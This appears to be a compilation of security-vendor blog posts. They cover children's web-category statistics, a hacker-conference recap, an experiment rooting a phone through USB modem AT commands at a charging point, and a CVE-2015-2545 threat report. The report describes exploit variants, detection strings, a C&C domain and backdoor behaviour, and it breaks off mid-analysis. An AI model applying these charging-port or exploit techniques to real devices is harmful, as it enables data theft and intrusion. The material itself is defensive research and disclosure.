child spends online or using the computer, which apps can be launched and what personal data can be disclosed. One of the most important features of a parental control product, however, is the ability to restrict access to web resources containing undesirable content. This article examines the statistics of visits by children to websites with specific categories of content. For this we will use Kaspersky Security Network (KSN) statistics based on notifications by the Parental Control module in Kaspersky Lab products. These statistics will allow us to estimate which categories of undesirable websites children visit most often. How the statistics are collected Kaspersky Lab’s Parental Control module scans the content of the webpage that a child is trying to visit. If the site belongs to one of the 14 categories listed in the module, it notifies KSN (no personal data is involved and the user’s confidentiality is respected). Access to that webpage is only denied if the parents have selected the appropriate category in the product settings. The statistics are collected anonymously, regardless of whether the parents have selected the appropriate category (i.e., whether or not that category is blocked by Parental Control). It should be noted that these statistics do not include mobile device statistics. At the current time, web filtration is carried out for the following content categories: We selected the first 12 categories for analysis. We decided to omit “Religion” and “News media” as these categories were only introduced recently and sufficient statistics have not yet been collected. The global picture First of all, let’s look at the global statistics. Distribution of Parental Control notifications between the 12 website categories globally, April 2015 – April 2016. We can see from this diagram that children around the world spend most time on social networking sites and instant messengers, playing computer games, and, while online, repeatedly encounter the themes of alcohol, tobacco and drugs. Less frequently, children and teenagers visit online stores, watch videos and listen to music online, sometimes encounter obscene language and occasionally visit (perhaps accidentally) porn sites. These are the average statistics for the entire world. But are they the same for all regions or countries? It turns out that they aren’t. Regional differences For our comparison, we selected the top five website categories from the global ranking and looked at how they differed across five regions: • North America (US and Canada) • Western Europe (Austria, Belgium, UK, Germany, Denmark, Ireland, Spain, Italy, Liechtenstein, Luxembourg, Monaco, Portugal, France, Switzerland, Sweden) • CIS (Russia, Kazakhstan, Belarus, Ukraine) • Latin America (Argentina, Brazil, Mexico) • Far East (China, Singapore, Hong Kong, Macao, Taiwan, Japan, South Korea). The results of the comparison are shown below: Proportion of Parental Control notifications for Top 5 categories in different regions In North America, children visit social media websites, use instant messaging systems, chats and forums less frequently than the world average, although they show more interest in computer games, alcohol and online shopping. The situation in Western Europe is very similar to that in North America. In the CIS, children and teenagers are less interested in online shopping than in other regions. In Latin America, as well as in the CIS, Internet communication media are very popular with kids and teens, while computer games are played less frequently than in other regions. The situation is different in the Far East. Social networks are almost as popular there as they are in western countries, but kids and teens don’t spend as much time playing online computer games (which may be due to the popularity of game consoles). Instead, they spend more time visiting online shops, such as the Japanese Rakuten, amazon.co.jp, Uniqlo, and Taobao in China. Differences between countries We found that even between countries within the same region there are differences in the popularity of the website categories. For the purposes of comparing the situations in different countries, we added the “Adult content” category to the top five. Let’s begin with that category. Adult content When we speak of children’s safety online, it’s impossible to avoid the topic of pornography – this is the worst nightmare for millions of parents. For quite some time, this category was at the top of the ratings, but we now have some good news! According to Kaspersky Lab’s Parental Control statistics, children from around the world are visiting pornographic and erotic websites, adult dating sites and online sex shops less and less. Popularity of the “Adult content” category around the world, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control module statistics However, we cannot rule out the possibility that children visit adult content websites from their mobile devices: for them, it is easier to watch porn on their phone, with no parental control tools installed, than it is on a computer that is closely watched by their parents. Children in China show the most interest in adult content sites. Children in the UK, US and Russia visit such sites less often. Popularity of the “Adult content” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control module statistics According to Kaspersky Lab’s Parental Control statistics, the adult content website www.xvideos[.]com is the most popular in all regions. If the Parental Control module is configured to block access to adult content sites, then a child’s attempt to visit this site will finish with a warning screen being displayed. It should be noted that Safe Kids, Kaspersky Lab’s new product, works on mobile devices as well: Safe Kids notification on a mobile device If you want to reliably safeguard your child from adult content, make sure you block this category in the parental control module. Internet Communication media 67% of all visits were to websites belonging to the “Internet communication media” category, which includes social networks, instant messengers, chats and forums. Unsurprisingly, social networks are the most popular sites with children throughout the world – these sites allow them to talk to their friends, keep a kind of diary, share photos and videos, as well as shop online, play games, and watch cartoons or films. As well as all that, there is a lot of content that children shouldn’t be seeing: on some social networks you can find pornography, purchase drugs. The most frequently visited sites in this category are Facebook, Twitter, YouTube and Pinterest. To a lesser extent children also visit Instagram and the web-based version of the WhatsApp messenger. According to KSN data, over the last year and a half children and teenagers have been spending less time chatting with their friends online from their computers. Popularity of the “Internet communication media” category worldwide, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control statistics We presume that this is due to the growing popularity of mobile Internet. Today, mobile devices are being used more and more for online communications, especially in developed countries. This is beyond the scope of this analysis, however, as we are looking at the statistics of Parental Control module detections on computers; these statistics don’t take into account how many times a day children and teenagers visit their social media accounts from mobile devices. Also, IM services such as Telegram or Viber are primarily accessed from mobile devices. In other words, children, and especially teenagers, are far more active than these statistics suggest when it comes to both types of online communications (i.e. mobile- and computer-based). Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics Internet communication media are most popular in Mexico, Brazil, Russia and Italy, and least popular in China, Germany and the UK. We presume that for China, this is due to the state’s Internet censorship practices, while in Germany and the UK it is related to the widespread use of mobile technologies and smartphones in the everyday lives of schoolchildren. This is all well and good – technologies make our world more convenient, and talking to someone face-to-face on the other side of the planet can seem like magic! But any magic has a dark side to it. Child molesters, fraudsters, trolls, perverts and other nefarious characters can spoil the life of a child or teenager who doesn’t stick to the rules of conduct on social networks. Read more here about how children and teenagers should behave on the social networks to protect themselves from malicious users. Computer games Children have always played games. However, in recent decades real-life games have been almost completely superseded by computer games. Today’s computer games are products of advanced technologies; they are realistic, social, absorbing, spectacular creations by designers and script writers. It comes as a little surprise that gaming sites around the world come second in terms of popularity among children and teenagers. Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics Computer games are least popular in Japan, Italy and Mexico. However, in these countries there are different reasons for this. Game consoles such as Sony PlayStation and Nintendo are widespread in Japan, where they are manufactured. In Mexico and Italy, judging by our statistics, kids and teens simply prefer social networks to computer games. Steam is one of the gaming sites most often visited by children and teenagers. It is in fact more than a mere online gaming store – it is a large gaming community where kids and teens can talk to fellow gamers, find new friends, read news and, naturally, purchase games and share their in-game achievements. Steam’s homepage As can be seen in the statistics of websites visited by children, Minecraft is another gaming website that children and teens often visit. Minecraft can be seen as an educational (edutainment) game, and in some countries it is even part of the school curriculum, within the framework of the MinecraftEdu project. The time that your child spends playing computer games needs to be regulated. Overindulging in games can lead to a dependence. This is especially relevant for so-called infinite games that are limited to one game plot and do not have a beginning or end. Massively multiplayer online role-playing games (MMORPG) fall under this category. Cases are known when overuse of MMORPG has led to psychological harm, gaming addictions and even to death by exhaustion. Parents should also take note of what games their child is playing, the age ratings and the contents of the game, as well as the kind of skills they develop. Computer games are not bad, but it’s better for children to spend their time productively. Alcohol, tobacco, narcotics The popularity of websites in the “Alcohol, tobacco, narcotics” category came as a bit of a surprise. Children in Germany (22.79%) and the UK (25.37%) show most interest in this topic. Popularity of the “Alcohol, tobacco and narcotics” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics However, a child can encounter this topic just about anywhere on the Internet. For example, in all types of teenager blogs it is not uncommon to see a picture of a girl with a bong, or pictures glorifying vodka. Publications in social media promoting the consumption of alcohol, tobacco or drugs Similar messages often occur on different entertainment sites, such as 9gag. Images published on the website 9gag In recent years, “legal highs” have become widespread, and can be easily purchased online. The authorities in different countries have trouble keeping up and block hundreds of new legal high websites that appear online every day. Social media also contains numerous offers to buy “legal” narcotics. Online shop selling “legal highs” Synthetic drugs are by no means legal, let alone safe. The effect of consuming “spice” and “salts” is unpredictable and can lead to serious harm. Electronic commerce The popularity of this category shows just how interested children are in online shopping. Popularity of the “Electronic commerce” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics As we can see, children and teenagers in China, Japan and the US visit online shops more frequently than others. Judging by the list of websites most often reported by the Parental Control module, the most popular online shops are Taobao in China, Uniqlo in Japan, and Amazon in the US. Software, audio and video An interesting trend can be seen in the “Software, audio, video” category. Over the last year and a half, visits by children and teenagers to visit websites where they can download or watch films, cartoons or listen to music have doubled. Popularity of the “Software, audio, video” category in different countries, January 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics On the face of it, this website category doesn’t seem to be a big deal. However, you shouldn’t forget about illegal software and malware – it may not hurt your child, but could cause quite a bit of damage to your computer. Popularity of the “Software, audio, video” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics Children in Japan watch cartoons and listen to music online more often than their peers in other countries. The figures for Russia and Mexico are the lowest. In Russia, this may be due to the fact that most young users listen to music on the VKontakte social network. According to Kaspersky Lab’s Parental Control statistics, YouTube is the most popular website in this category. Conclusion The popularity of certain types of websites among children in different countries could be linked to each country’s cultural peculiarities and economic conditions. If we look at the entire global picture, there is a downward trend in the popularity of Internet communication media among children and teenagers. The underlying reason is the increasing use of mobile technologies and the availability of smartphones in developed countries, the emergence of convenient mobile social media and Internet communication apps, and the fact that users can always stay online thanks to their mobile devices. However, in those countries where smartphones are less prevalent, children tend to use computers more often for online communications. Interestingly, the lower the “Internet communication media” index is for a specific country, the more popular computer games are: Popularity of the “Internet communication media” and “Computer games” categories in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics It’s interesting to see that children are becoming increasingly self-sufficient online: they choose which music they want to listen to, which films or cartoons they watch, and which products they want to – possibly – purchase. Self-reliance is a positive trait for your child, but you still need to keep tabs on what they are doing online, just like in real life. Parental control software may just be an aid to safeguard your child from undesirable content, but it could well come in very handy – so don’t just dismiss it out of hand. For example, Kaspersky Lab’s product Safe Kids not only blocks undesirable sites but also notifies the parents of any alarming search requests that a child makes, and about their activities on social media. Since Safe Kids operates on mobile devices as well, parents can also get information about where their child is. For today’s children, and especially teenagers, the Internet is their natural habitat. We do everything we can to keep it safe. ### BerlinSides …electrifying! Mon, 05/30/2016 - 05:57 It was the last weekend of May and just like every year, hackers, forensic experts and pentesters met at the University Hall in Berlin for the BerlinSides conference. ‘A con from hacker for hacker’. This years motto is ‘electrifying’ and the badges and shirts show the picture of Nikola Tesla. BerlinSides is the successor of the PH-Neutral conference held by FX, who once said he’s going to host his conference for ten years. After that, Aluc stepped in and now runs the BerlinSides conference since 2010. Start was right after the PXE conference ends on Friday 27th of May and it lasts for four days. As usual, the last day got labeled “OpSec 4 Nerds” and held in a Dojo. It’s about “hand to hand combat” and optional to all attendees who have a good health insurance. Today is the last day of the conference and the exercises in the Dojo are going on right now. The schedule of the conference can be found here: http://berlinsides.org/?page_id=1911 In contrast to the Chaos Computer Congress, this conference is by invitation only and just like in Las Vegas, what’s happening inside of BerlinSides stays inside. No journalists, cameras or any recording devices are allowed. Speakers can go into details and give some unique insights in projects, incidents and new vulnerabilities. 0x100 people attended the conference this year and beside the talks I also enjoyed the networking, music and party. I met people I haven’t seen for a while, some I never met before and we had some good discussions. Kaspersky Lab is the premium sponsor of this years’ conference and we are happy to see such great events and to support the community. My colleague Stefan Ortloff held the opening talk named “Cross-Platform Malware To Attack The Bitcoin-Sphere” and gave some insights in an ongoing investigation conducted by himself. (Host Aluc on the right, me on the left side) Due to the nature of this conference, there aren’t any further details I can add to this blog, but I’d like to thank Aluc for his commitment and I look forward attending next year again! ### Wired Mobile Charging – Is it Safe? Thu, 05/26/2016 - 06:56 Mobile phones. Nowadays, they are our constant companions, our confidants. They know everything about our everyday lives. Every day, whether we’re on our way to or from work or just wandering around the city, mobile phones collect this information. We take photos, share our impressions on social networks, send work and non-work related mails, text messages, and make calls. All this information makes our smartphones a treasure trove for data thieves. And we are confident that all this data is secure. Manufacturers assure us that their devices and the data on them are safe. They release updates containing security fixes. We also take steps to protect our privacy. Tinkering users install custom firmware, discover operating system mechanisms, acquire root access to have deeper control over their phone and use software that, according to them, is more secure and convenient. The average user who prefers to just use his phone without digging any deeper, sets a PIN code, a complex password or fingerprint scanner, and sticks to official app stores. Most users believe these measures make their data safe. But is that really the case? The following experiment displays, that sometimes just charging your device may bring you trouble. Data transmission A while ago I started to dig a bit deeper into what happens when you connect your phone to your computer. Usually, when your phone is protected, you will only see the phone name on your PC. If it has no PIN/password, you’ll be able to access all the media files on the device. The amount of data exchanged varies depending on manufacturer, OS version, low-level firmware. But data is always present. Even if it’s a phone with the latest Android OS (Marshmallow), or iOS 9. Data transmission – comparison table Here is a comparison table on the data exchange between a computer and connected mobile phone during the handshake. It varies depending on the mobile and desktop OS combination: Codes: DN – Device Name DM – Device Manufacturer DT – Device Type SN – Serial Number FW – Firmware info OS – Operating System info FS – File system info/file list ECID – Electronic Chip ID Device Device OS Mode Host OS Data size (bytes) Data type Nexus 5 Android 4.4 MTP (default) Windows 8.1 32 336 DN, DM, DT, SN, FS MTP (unblocked) Windows 8.1 32 155 DN, DM, DT, SN, FS MTP + ADB Windows 8.1 11 946 DN, DM, SN MTP (default) Windows 10 8 827 DN, SN MTP (unblocked) Windows 10 242 206 DN, SN, FS MTP + ADB Windows 10 10 582 DN, SN, FW MTP (default) OSX 10.9 1 213 DN, DM, DT, SN MTP (unblocked) OSX 10.9 581 DN, DM, DT, SN Nexus 6 Android 6.0.1 Charging only (default) Windows 8.1 8 965 DN, DM, SN MTP (unblocked) Windows 8.1 39 418 DN, DM, DT, SN, FS Charging only (default) Windows 10 8 975 DN, SN MTP (unblocked) Windows 10 91 342 DN, SN, FS Charging only (default) OSX 10.9 14 000 DN, DM, DT, SN MTP (unblocked) OSX 10.9 7 674 DN, DM, DT, SN Samsung Galaxy S4 Android 5.0.1 MTP (default) Windows 8.1 4 098 DN, DM, DT, SN MTP (default) Windows 10 7 740 DN, DM, DT, SN, FS, FW Apple iPhone 5 iOS 9.1 Default (locked) Windows 8.1 5 001 DN, DM, SN Default (locked) OS X 10.9 83 272 DN, DM, DT, SN, OS, ECID, device public key Unblocked + Paired Windows 8.1 1 829 145 UniqueChipID, device class, iOS version, SessionID, device model, File System total size, File system free space Unblocked + Paired OS X 10.9 23 223 DN, DM, DT, SN, OS, ECID, device public key All in all, that’s quite a fair amount of information about the device. What else? While I was conducting this minor research, I stumbled upon one very peculiar feature in a smartphone from a very popular manufacturer. I found out that while installing the CDC driver (I was using a normal Windows PC and completely standard microUSB cable) this phone also installs a COM-port, labelling it as a modem. At first glance it doesn’t look like anything unusual. However, this phone had no USB tethering enabled, and no Developer mode or ADB (USB debugging) enabled either. This COM-port is available for connection using default methods. So, we reached the modem. Or not. What we reached is probably just an interface layer that allows us to talk to the modem; it’s not a direct connection. Now for the theory. Android consists of different layers, one of which is RIL. RIL stands for Radio Interface Layer. It is responsible for allowing Application level apps (e.g. Android telephony framework) to interact with modem hardware via specific commands (both send requests and receive answers). To avoid going too deep into the details, I won’t describe the RIL Java sub-layer that talks to the rild daemon, or Vendor RIL. Let’s just call it RIL (Radio Interface Layer). Historically, all modems use a command set called the Hayes command set, developed by Dennis Hayes way back in 1981. The commands used to talk to the modem are called AT-commands. The commands that are available for applications to call through RIL, and for RIL to transmit to the modem, vary depending on the modem firmware limitations set by the manufacturer, RIL limitations, etc. Many manufacturers also implement their own vendor-specific commands for their modems. For example, Qualcomm uses AT$Q<command> extension, Infineon – AT+X<command>

ATI1-9 commands return general information about the device and modem, e.g.
ATI1 returns the software version code.

ATI2 returns IMEI numbers. From here we can see that the device has a dual-sim.

Digging, digging

By digging a bit further, we can find all the commands available for the modem. Note that many of them are restricted and/or require parameters and will return an “Error” otherwise.

By the way, vendor-specific commands won’t be listed here!

We can check the mobile signal level by AT+CSQ, battery level, etc.

There is also one very interesting command – a default for modems – that allows any number to be dialed regardless of whether the screen is locked or not. This is a very peculiar feature for phones locked with a PIN code, because you can usually only call an emergency service from a locked screen.

There are commands that allow you to read the SIM card’s phonebook. The phonebook is not accessible on this particular phone, but who knows about other vendors?

The scary part

You may think: “So what? What can be done with this information?” But just think about it, you can pull vendor information, firmware details. That gives you enough data to analyze the device’s security. You can find out the owner’s mobile phone number – by calling your number. By finding out the battery level you can predict how long the user will keep the charger plugged in. Not bad at all, I’d say.

But there’s more that you can do with this information.

Experimenting further I stumbled across one more command – it actually performs a phone reboot to the firmware update mode. This mode actually allows an infiltrator to perform all kinds of actions with the user’s device, given the right circumstances.

So I conducted an experiment. I restored the phone to the factory firmware, reset it to default settings to ensure no other interface like ADB was available outside.

First, I connected the phone to my computer.
Then I pulled the firmware data with AT commands, to determine the device type and OS.
After that I entered that last command I came across and the phone rebooted to the firmware update mode!

What happened next?

With the information gathered via AT commands, I identified the device.

And then I used an easy-to-use root solution as a proof-of-concept. So I found the appropriate package for the device, fired up the firmware update application, and here’s what happened next:

The update took around a minute (the file is very small). The phone rebooted to perform an actual root installation:

Root package was installed, and it cleaned itself up.

The phone rebooted again, and what do we see –

All the user’s data is safe, but now he has one more app that cannot be uninstalled with default measures and it has root access to file system. I checked the timer – it took a little under 3 minutes for the whole procedure, and that’s taking into account that I was pressing buttons manually.

Imagination time

Now it’s time to use your imagination. What if?

What if that package didn’t have a generic purpose (with lots of additional features), but had one specific task to install a specific application or change the device configuration?

That would make it possible to minimize the package size and script, thus reducing the installation time.

What if it installed a system daemon, instead of some package? What if it installed a backdoor? What if it was some kind of Android Trojan – which are very common nowadays – and worked in the background, sharing everything on your phone with someone sitting on the other side of the world?

What if it enabled developer mode and ADB, and added the computer’s fingerprint to a trusted database? These changes wouldn’t be detected by a security solution (if one was installed), since they are default phone functions. It also wouldn’t take very long to execute.

And what can we do from a trusted computer via ADB to the connected phone?

The answer is – a lot. We can install and delete applications. We can back up the message database, photos and videos, the applications cache and data files. And it can be done pretty fast.

And these scenarios are only those that involve data theft.

There are other possible destructive actions such as wiping the phone, deleting data, encrypting data and asking for a ransom. The possibilities are infinite.

So let’s imagine a scenario where you are on a trip and you just got off the plane after a flight of 5-8 hours. Your phone is almost dead. You find a charging station with USB – a blessing!

You connect your phone to start charging, put it down and mind your own business for 20-30 minutes, or more. Or less. It doesn’t matter.

Now look at what has been described above. How long do you think it will take for a script to perform those actions, download every bit of data from your phone and/or infect it with malware?

With that sort of data you can be hacked, you can be tracked, your data (including corporate data) can be compromised or destroyed.

Simple as that.

Conclusion

There are large communities around the world that specialize in exploring operating system internals, modifying them and releasing the results of their hard work to the public.

Other people use the results of this work to upgrade their devices. But there is no guarantee that the firmware they have just installed on their phone is free from vulnerabilities and backdoors. They may forget to disable the developer or debugging mode. They may be installing a hidden package, or background service for data collection and transfer.

Despite all manufacturer’s efforts, absolute security of mobile devices is virtually unreachable.

Our experiment proves it. It has been conducted on just one vendor, but there’s nothing to say that holes like this don’t exist on the phones of other vendors. All of the above was done using public information only.

I dug around and found that this vulnerability was found at Black Hat and reported some time back in 2014. It did not create much of a buzz, as far as research of the news and social media shows, and it still exists, even on the very latest models.

While working on this article I found that these guys also discovered this hole, to some extent.

Stealing data from connected to a computer mobile phone technique has been utilized, for example, during ill-known cyberespionage campaign Red October in 2013.

Possibility of data theft from mobile phone when using public charging spots has been described by our experts in 2014. You may think that it is paranoid to think that no one will bother with installing malicious charging stations at airports, cafes, bus stations. But we think differently.

### CVE-2015-2545: overview of current threats

Wed, 05/25/2016 - 06:56

CVE-2015-2545 is a vulnerability discovered in 2015 and corrected with Microsoft’s update MS15-099. The vulnerability affects Microsoft Office versions 2007 SP3, 2010 SP2, 2013 SP1 and 2013 RT SP1.

The error enables an attacker to execute arbitrary code using a specially crafted EPS image file. The exploit uses PostScript and can evade Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods.

The exploit was discovered in the wild in August 2015, when it was used in a targeted attack by the Platinum group, presumably against targets in India. Over the following months, there was significant growth in the number of threat actors using the vulnerability as a primary tool for initial penetration, with both the attack groups and their targets located in South-East and Central Asia and the Far East.

In this research paper, we discuss examples of attacks using the CVE-2015-2545 vulnerability undertaken by some of these groups.

Overview of groups using CVE-2015-2545

Platinum (also known as TwoForOne)

The group is believe to originate from South-East Asia. Its attacks can be traced as far back as 2009. The group is notable for exploiting 0-day vulnerabilities and carrying out a small number of highly focused targeted attacks – mostly against government agencies in Malaysia, Indonesia, China and India.

This group was the first to exploit the CVE-2015-2545 vulnerability. After the vulnerability was corrected with Microsoft updates in September and November 2015, no new Platinum attacks exploiting this vulnerability have been detected.

Microsoft presented the activity of this group at the SAS conference in February 2016, and in its paper: PLATINUM: Targeted attacks in South and Southeast Asia.

APT16

The group has been known for several years and is believed to be of Chinese origin. In November and December 2015, it used a modified exploit for CVE-2015-2545 in attacks against information and news agencies in Taiwan. These attacks were described in a FireEye research paper – The EPS Awakens – Part 2.

EvilPost

In December 2015, Kaspersky Lab became aware of a targeted attack against the Japanese defense sector. In order to infect victims, the attacker sent an email with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office using an embedded EPS (Encapsulated Postscript) object. The EPS object contained a shellcode that dropped and loaded a 32-bit or 64-bit DLL file depending on the system architecture. This, in turn exploited another vulnerability to elevate privileges to Local System (CVE-2015-1701) and download additional malware components from the C&C server.

The C&C server used in the attack was located in Japan and appears to have been compromised. However, there is no indication that it has ever been used for any other malicious purpose. Monitoring of the server activity for a period of several months did not result in any new findings. We believe the attackers either lost access to the server or realized that it resulted in too much attention from security researchers, as the attack was widely discussed by the Japanese security community.

According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.

This document embedded an EPS object file, which triggered a vulnerability in the EPS format handler in Microsoft Word. Even with an exploit component, Microsoft Word rendered the document correctly and displayed the decoy message. The document is written in good Japanese, as shown below.

It has been used to decoy New Year impressions of defense-related organizations.

This attack was also described in the FireEye report, mentioned above.

An overview of the activity of the EvilPost group activity was provided to subscribers of the Kaspersky Lab Threat Intelligence Service in March 2016. For information about the service, please write to intelreports@kaspersky.com.

SPIVY

In March and April 2016, a series of emails laced with an exploit forCVE-2015-2545 were detected. The emails were sent in spear-phishing attacks, presumably targeting organizations in Hong Kong. Identifying a specific group behind these attacks is difficult because they used a new variant of a widely available backdoor known as PoisonIvy (from which the name of the group, SPIVY, is derived). A description of these incidents can be found in the PaloAlto blog.

Danti and SVCMONDR

These two groups have not yet been publicly described. An overview of their attacks and the tools used is provided in this report.

Danti attacks

Danti (Kaspersky Lab’s internal name) is an APT actor that has been active at least since 2015, predominantly targeting Indian government organizations. According to our telemetry, Danti has also been actively hitting targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

The group implemented a new campaign in February and March 2016, using a repurposed implementation of the CVE-2015-2545 exploit with custom shellcode. In order to infect the victim, the attackers distributed spear-phishing emails with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office. The exploit is based on a malformed embedded EPS (Encapsulated Postscript) object. This contains the shellcode that drops a backdoor, providing full access to the attackers.

Main findings:

• Danti, a previously unknown group, is probably related to NetTraveller and DragonOK
• In February-March 2016 the group was observed using CVE-2015-2545
• It remains active, conducting attacks against Indian diplomatic organizations
• Related attacks have been observed against Central and South East Asia targets

The campaign leveraging the exploit for CVE-2015-2545 took place in February 2016. As a result, several emails with attached DOCX files were uploaded to VirusTotal. The email recipients were connected to the Indian Ministry of External Affairs, as can be seen below:

• dsfsi@nic.in, the Foreign Service Institute, Ministry of Foreign Affairs (Under Secretary (FT/NRG), dsfsi@mea.gov.in)
• chumarpost@gmail.com, possibly related to the Chumar military post in India, a disputed area between India and China (the mail server is the same as the Indian Ministry of Foreign Affairs- vastuXX.nic.in)
• chancery@indianembassy.hu, the Indian embassy in Hungary
• amb.copenhagen@mea.gov.in, the Indian Embassy in Denmark
• amb.bogota@mea.gov.in, the Indian embassy in Colombia

All these attacks took place between the 2nd and 29th of February, 2016.

Target and date Attachment name Sender Indian embassy in Hungary
2nd February Mission List.doc unknown (original email was forwarded) Indian embassy in Denmark
2nd February HQ List.doc mout.gmx.com ([74.208.4.200]) Indian embassy in Colombia
2nd February HQ List.doc mout.gmx.com ([74.208.4.201]) DSFSI
24th February India’s 10 Top Luxury Hotels.doc 191.96.111.195 via mout.gmx.com ([74.208.4.201]) Chumapost
29th February India’s 10 Top Luxury Hotels.doc 43.227.113.129 via mout.gmx.com ([74.208.4.200])

In the case of the Indian Embassy in Hungary, it looks like the original message was forwarded from the embassy to the Indian IT security team in the Ministry of Foreign Affairs, and uploaded later to Virus Total.

Initial vector

The emails that were analysed had originally been sent via “3capp-mailcom-lxa06.server.lan”, perhaps using a spam-mailer program. In all known cases, the sender used the same gate at 74.208.4.200/74.208.4.201 (mout.gmx.com), a well-known open relay SMTP server.

The email messages changed for different waves of the campaign. When the campaign started in February 2nd, the emails carried the subject headers “Mission List” and “HQ List”, and forged the identity of a real sender.

Original message used in the first wave of attacks

As can be seen above, the original email was supposedly forwarded from Anil Kumar Balani, Director of the Department of Information Technology at the Indian Ministry of Communications & Information Technology.

Mission List decoy document

At the same time, attackers sent a slightly different document with the subject “HQ List” to other Indian embassies (for example, those in Denmark and Colombia):

Original HQ List email

K.Nagaraj Naidu is Director of the Investments Technology Promotion Division in the Ministry of External Affairs, and a former Counsellor (T&C) at the Embassy of India in China.

HQ List decoy document

Both files (“Mission List” and “HQ list”) have different decoy content, but both use the same CVE-2015-2545 EPS exploit (image1.eps, MD5 a90a329335fa0af64d8394b28e0f86c1).

Interestingly, as can be seen in their metadata, both files were modified by the user “India” on 01.02.2016, just one day before they were sent to targets.

For the attacks at the end of February, the attackers decided to use the less relevant subject header of “10 top luxury hotels in India”, sent from an unknown sender.

Top Luxury Hotels spear-phishing email

This new attachment contains the same EPS exploit, but uses a different decoy document and a new payload.

Top 10 Luxury Hotels decoy document

The text of the document was copied from a Forbes article published in 2007. According to its metadata, the document was created in June 2015, so it has probably been used before in unknown attacks.

However, the same mail gate (mout.gmx.com) was used as for the 2nd February attacks.

All the “doc” files are Web Archive Files and contain decoy documents and a malicious EPS. The structure of the WAF files is the same in all three cases:

Web archive structure

Exploit

The attackers used at least one known 1-day exploit: the exploitforCVE-2015-2545 – EPS parsing vulnerability in EPSIMP32.FLT module, reported by FireEye, and patched by Microsoft on 8 September 2015 with MS15-099.

We are currently aware of about four different variants of the exploit.

The original one was used in August 2015 against targets in India by the Platinum (TwoForOne) APT group.

Original EPS exploit, used in August 2015

The second (which is a modified variant of the original exploit) was used in EvilPost attacks against Japan in 2015, and then reused by cybercriminals in March 2016. This variant was also used by the APT16 group (ELMER backdoor) in Taiwan in December 2015. The second variant is easily recognized by the specific strings in its EPS shellcode:

The “h:\\test.txt” string could have been forgotten by the exploit developer

The third variant was used in December 2015 against a Taiwanese organization, and in February 2016 against an Indian diplomatic organization. This variant uses different shellcode but is based on the original exploit from the Platinum (TwoForOne) APT:

Can be recognized by “add2 <eb135” substring

In the third variant, the binaries with the encrypted malicious exe file and the decoy document can be found at the end of the files.

In the third variant, the binary starts with “PdPD” (50 64 50 44), a marker previously used for encrypted binaries by a number of APT groups (Anchor Panda, Samurai Panda, Temper Panda).

Encrypted data at the end of the eps file

The decryption function is 1-byte XOR with a key from “\x00” to “\xff” and replacement of the Odd byte for an Even byte in several hundred bytes from the header.

Decrypted exe file

Decrypted decoy document

We detected a few different EPS objects in the exploit and these are analyzed below. The fourth variant of the exploit is analyzed in the “March attack” section.

March attack

At the end of March 2016, we discovered a new wave of attacks by the Danti group against Indian governmental institutions. On March 28th several malicious document were sent to various recipients at the Cabinet Secretariat of Government India from the email account of Ms. Richa Gaharwar (<richa.gaharwar@nic.in>), Deputy Secretary at The Department of Administrative Reforms and Public Grievances, the nodal agency of the Government of India.

Email sent from the account of Ms. Richa Gaharwar

The message was sent from an internal IP address using Oracle Communications Messenger. This could mean that the employee workstation used to send the malicious emails had been fully compromised.

The attachment contains the file “Holidays in India in 2016.docx” with the embedded EPS exploit. This time the attackers used the second variant of the exploit (previously used by the EvilPost and APT16 groups), with minor changes:

• They removed the part with the “h:\\test.txt” strings
• Dropped the binary added at the end of the EPS object (the same as in the third variant of the exploit)

Instead of using the “PdPD” string as a marker for binary, they used a new identifier: “1111111122222222”

New identifier used

All these changes created a new variant of the exploit, detected by very few antivirus products.

The decoy document was created on January 27th, and then modified by adding the EPS exploit on March 28th, right before the attack.

Decoy document

According to its metadata, the document was created and modified by Chinese users:

The dropped file is a RarSFX archive (331307 bytes). According to comments in the archive, this was also created by a Chinese user:

The dropper installs four files in the system. The “Appinfo.dat” file launches “PotPlayerMini.exe”, monitors the memory periodically with the GlobalMemoryStatus API function and writes the results to “C:\windows\memstatus.txt”

The main loader “PotPlayerMini.exe” is a legitimate multimedia player from Daum Communication. The file is signed with a legitimate signature from “Daum Communications Corp.”

Digital signature information

This legitimate file is used by the attackers to load a malicious, unsigned file from the same folder: PotPlayer.dll (the hardcoded PDB path inside is “C:\Users\john\Desktop\PotPlayer\Release\PotPlayer.pdb”). This, in turn executes appinfo.dat (the hardcoded PDB path inside is “D:\BaiduYunDownload\ServiceExe\Release\ServiceExe.pdb”), which is a Yoda-compressed binary. The backdoor code is stored inside update.dat.

The potplayer.dll “PreprocessCmdLineEx” export function:

• Creates a service named “MemoryStatus” with a path to “appinfo.dat” file and sets it to HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Run with the name “potplayer”.
• Opens “update.dat” file, decrypts it with xor operations and passes the execution to the result buffer.

“update.dat”, a backdoor:

Makes its first GET request to hardcoded CnC “newsupdate.dynssl.com/index.html” in order to get the new CnC in the response.

If 407 response code is returned (Proxy authentication required) then the sample sends the request again with “proxyname” string as the proxy username and “proxypass” string as the proxy password. That suggests that may be the sample is compiled using some builder where these parameters must be set manually and in this specific sample were not changed from default.

Finds “8FC628C9F43D42E2B77C2801518AF2A5” substring and decrypts it using AES CTR mode thrice using three 16-bytes keys.

Makes a POST request to the new CnC with “im=validate” URL parameter and expects “success” string as the response.

Forms the following structure in order to send to CnC in POST-request after AES encryption:

• “CFB4CDE8-9285-4CC2-ACE2-CD9CCDF22C0D” string
• Local IP
• Host name
• 0x3E9 dword
• OS version
• SYSTEM_INFO structure

Decrypts the response using AES with one key.

Commands:

